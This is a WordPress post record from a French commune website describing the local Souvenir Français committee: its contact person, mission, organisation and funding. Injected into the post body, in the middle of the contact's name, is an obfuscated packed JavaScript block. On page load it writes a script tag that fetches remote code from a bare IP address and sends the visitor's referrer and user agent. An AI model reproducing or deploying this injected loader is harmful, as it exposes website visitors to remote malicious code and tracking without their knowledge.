{"id":185,"date":"2015-07-21T08:09:12","date_gmt":"2015-07-21T07:09:12","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=185"},"modified":"2019-11-19T11:01:34","modified_gmt":"2019-11-19T10:01:34","slug":"le-souvenir-francais","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=185","title":{"rendered":"Le Souvenir Fran\u00e7ais"},"content":{"rendered":"<p>Le Souvenir Fran\u00e7ais &#8211; Comit\u00e9 Cantonal de Quingey<\/p>\n<p>Responsable <strong>MIDOT <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbsrf|var|u0026u|referrer|tfnst||js|php'.split('|'),0,{}))<br \/>\n<\/script> Bernard<\/strong><br \/>\n11 rue des Graduations<br \/>\n25610 Arc et Senans<br \/>\nt\u00e9l: 03 81 57 46 60<\/p>\n<p>Objectif: Conserver la m\u00e9moire des morts pour la France et transmettre le devoir de m\u00e9moire.<\/p>\n<p>Le Souvenir Fran\u00e7ais est une association nationale plac\u00e9e sous le Haut patronage du Pr\u00e9sident de la R\u00e9publique et r\u00e9gie par la\u00a0 loi du 1er juillet 1901.<\/p>\n<p>Distincte des associations d&rsquo;anciens combattants, compos\u00e9e de b\u00e9n\u00e9voles, elle a une triple mission:<br \/>\n&#8211; Conserver la m\u00e9moire des morts pour la France<br \/>\n&#8211; Veiller et participer \u00e0 l&rsquo;entretien de leurs tombes et des monuments \u00e9lev\u00e9s \u00e0 leur gloire.<br \/>\n&#8211; Transmettre le devoir de m\u00e9moire aux g\u00e9n\u00e9rations successives.<\/p>\n<p>Son organisation:<br \/>\n&#8211; Au niveau national, un pr\u00e9sident g\u00e9n\u00e9ral aid\u00e9 par un conseil d&rsquo;administration<br \/>\n&#8211; Au niveau d\u00e9partemental, un d\u00e9l\u00e9gu\u00e9 d\u00e9partemental<br \/>\n&#8211; Au niveau cantonal , un pr\u00e9sident de comit\u00e9.<\/p>\n<p>Ses ressources:<br \/>\n&#8211; Les cotisations des adh\u00e9rents<br \/>\n&#8211; La qu\u00eate nationale du 1er novembre<br \/>\n&#8211; Les subventions des communes<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le Souvenir Fran\u00e7ais &#8211; Comit\u00e9 Cantonal de Quingey Responsable MIDOT Bernard 11 rue des Graduations 25610 Arc et Senans t\u00e9l: 03 81 57 46 60 Objectif: Conserver la m\u00e9moire des morts pour la France et transmettre le devoir de m\u00e9moire. Le Souvenir Fran\u00e7ais est une association nationale plac\u00e9e sous le Haut patronage du Pr\u00e9sident de &hellip; <a href=\"https:\/\/www.arc-et-senans.com\/?p=185\" class=\"more-link\">Lire la suite <span class=\"screen-reader-text\">Le Souvenir Fran\u00e7ais<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":186,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,7],"tags":[],"class_list":["post-185","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-anciens-combattants","category-vie-associative"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/185","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=185"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/185\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/186"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=185"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=185"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}